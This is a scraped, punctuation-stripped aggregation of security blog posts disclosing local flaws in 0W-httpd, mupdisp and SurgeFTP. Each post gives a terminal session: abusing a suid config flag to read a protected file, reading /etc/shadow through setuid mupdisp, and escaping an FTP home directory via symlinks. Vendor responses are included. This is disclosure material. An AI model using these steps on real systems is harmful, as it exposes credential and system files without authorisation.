concept anyways milw0rm was kind enough to host it for me - here I was poking around some ports on my freebsd box and found a privileged partial read via the configuration file flag in 0W-httpd ZeroWait httpd too bad its only suid sgid www root freebsd tmp ls -al usr local sbin 0W-httpd -rwsr-sr-x 1 www www 111100 May 5 15 50 usr local sbin 0W-httpd root freebsd tmp echo www's-eyes-only secret root freebsd tmp chown www www tmp secret root freebsd tmp chmod 700 tmp secret root freebsd tmp exit exit rush freebsd cat tmp secret cat tmp secret Permission denied rush freebsd usr local sbin 0W-httpd -f -c tmp secret 16 00 54httpd cannot create directory logs 2009-05-05 No such file or directory 16 00 54httpd cannot create directory logs 2009-05-05 No such file or directory 16 00 54httpd 53677 is starting to work 16 00 54httpd unknown option www's-eyes-only' 16 00 54httpd config error at www's-eyes-only usr local etc 0W-httpd tmp secret 1 16 00 54httpd 53677 is exited due to some init error rush freebsd IMAGE http://www.secuobs.com/revue/news/122388.shtmlhttp://www.secuobs.com/revue/news/122388.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - Apparently because attackers used a sql injection flaw in the administration panel at domainznet to deface the highest of high profile nz and pr websites Zone-H has got the full story Google and Gmail, Microsoft, MSN, MSDN, and Hotmail, Sony, Dell, and even Paypal weren't spared I'm not a fan of defacements but this is shocking Even though they got lucky and exploited the administation panel, which is far from a leet hack well, this still isn't too bad Its not like they broke the servers themselves, but they changed the DNS records There is a certain beauty in carefully crafted code, spawning a shell and breaking root but, yeah, easy works too Its been that time for a while for us to think outside the box any way we can Hacking is delicious IMAGE http://www.secuobs.com/revue/news/122387.shtmlhttp://www.secuobs.com/revue/news/122387.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I stopped to check the mail and barely got a snapshot of this haha In case your blind, my trip odometer reads 1337 it was turning to 1338, I tried to stop as fast as I could How cool is that D IMAGE http://www.secuobs.com/revue/news/122386.shtmlhttp://www.secuobs.com/revue/news/122386.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - Mup is a shareware program for printing music pourcents grep -B1 4755 mup-56 makefile For Linux console mode support, uncomment the following line chown root BINDIR mupdisp chmod 4755 BINDIR mupdisp pourcents ls -al usr bin mupdisp -rwsr-xr-x 1 root root 815245 2009-05-26 15 57 usr bin mupdisp pourcents usr bin mupdisp etc shadow Mupdisp - Version 56 Mup - Music Publisher Version 56 Copyright c 1995-2009 by Arkkra Enterprises All rights reserved etc shadow line 1 root 1 kXXXXXXXXXXXXXXXXXXXXXXXXXX 14360 0 99999 7 stopping due to previous errors pourcents Reading the first line of the grep output tells us that mupdist -- mupdisp runs Mup and then runs GhostScript on the result will be SUID root if the user enables Linux console mode support Vendor Response The tgz version already does not use setuid, so there should be no issue for people installing from that, unless they explicitly choose to change the mode The same is true for anyone compiling for themselves We will change the rpm spec file to not do setuid We can also suggest using sudo rather than setuid, which is a better alternative that was not available yet at the time mupdisp was originally written This came after explaining that a workaround fix Oh dear IMAGE http://www.secuobs.com/revue/news/122385.shtmlhttp://www.secuobs.com/revue/news/122385.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - There is a funny bug SurgeFTP that allows users to break out of their home directory SurgeFTP will follow symbolic links, so exploiting this is as easy as being able to create links to directories of your choosing rush ubuntu ftp example Connected to example 220 SurgeFTP example Version 23a6 Name example rush test 331 Password required for test Password 230- Alias Real path Access 230- home test read write 230 User test logged in Remote system type is UNIX Using binary mode to transfer files ftp pwd 257 is current directory ftp ls 200 PORT command successful 150 Opening BINARY connection for -rw------- 1 test test 75 Jun 4 22 09 bash_history -rw-r--r-- 1 test test 220 Jun 4 22 07 bash_logout -rw-r--r-- 1 test test 3115 Jun 4 22 07 bashrc -rw-r--r-- 1 test test 675 Jun 4 22 07 profile lrwxrwxrwx 1 test test 4096 Jun 4 22 09 fs - 226 Transfer complete ftp cd fs 250 CWD command successful now fs ftp pwd 257 fs is current directory ftp ls 200 PORT command successful 150 Opening BINARY connection for fs drwxr-xr-x 2 root root 4096 May 15 0 10 bin drwxr-xr-x 3 root root 4096 May 15 13 34 boot lrwxrwxrwx 1 root root 4096 Apr 28 12 02 cdrom - media cdrom drwxr-xr-x 3 root root 4096 May 22 14 32 debian drwxr-xr-x 15 root root 3800 Jun 4 13 11 dev drwxr-xr-x 160 root root 12288 Jun 4 22 07 etc drwxr-xr-x 6 root root 4096 Jun 4 22 07 home lrwxrwxrwx 1 root root 7534504 May 15 0 25 initrdimg - boot initrdimg-2628-11-generic lrwxrwxrwx 1 root root 8220906 Apr 28 12 34 initrdimgold - boot initrdimg-2627-7-generic drwxr-xr-x 20 root root 12288 May 22 14 18 lib drwx------ 2 root root 16384 Apr 28 12 01 lost found drwxr-xr-x 3 root root 4096 Oct 29 2008 media drwxr-xr-x 2 root root 4096 Oct 20 2008 mnt drwxr-xr-x 3 root root 4096 May 29 1 18 opt dr-xr-xr-x 153 root root 0 Jun 4 13 09 proc drwxr-xr-x 13 root root 4096 May 22 16 43 root drwxr-xr-x 2 root root 4096 May 15 20 09 sbin drwxr-xr-x 2 root root 4096 Mar 6 11 21 selinux drwxr-xr-x 2 root root 4096 Oct 29 2008 srv drwxr-xr-x 12 root root 0 Jun 4 13 09 sys drwxrwxrwt 17 root root 20480 Jun 4 21 50 tmp drwxr-xr-x 12 root root 4096 May 22 14 18 usr drwxr-xr-x 16 root root 4096 May 22 14 10 var lrwxrwxrwx 1 root root 3501776 May 15 0 25 vmlinuz - boot vmlinuz-2628-11-generic lrwxrwxrwx 1 root root 2244272 Apr 28 12 34 vmlinuzold - boot vmlinuz-2627-7-generic 226 Transfer complete ftp cd 250 CWD command successful now ftp pwd 257 is current directory ftp ls 200 PORT command successful 150 Opening BINARY connection for -rw------- 1 test test 75 Jun 4 22 09 bash_history -rw-r--r-- 1 test test 220 Jun 4 22 07 bash_logout -rw-r--r-- 1 test test 3115 Jun 4 22 07 bashrc -rw-r--r-- 1 test test 675 Jun 4 22 07 profile lrwxrwxrwx 1 test test 4096 Jun 4 22 09 fs - 226 Transfer complete ftp bye 221 Closing connection - goodbye rush ubuntu Since the user would have to be able to make the links in the first place probably using a shell , so risk is low in most circumstances Vendor Response Thanks for reporting this, here is a new build http netwinsitecom ftp misc surgeftp_23a10_linuxtargz This has a new setting global_nosymlink true which you can turn on to disable this behaviour Much better than nothing IMAGE http://www.secuobs.com/revue/news/122384.shtmlhttp://www.secuobs.com/revue/news/122384.shtml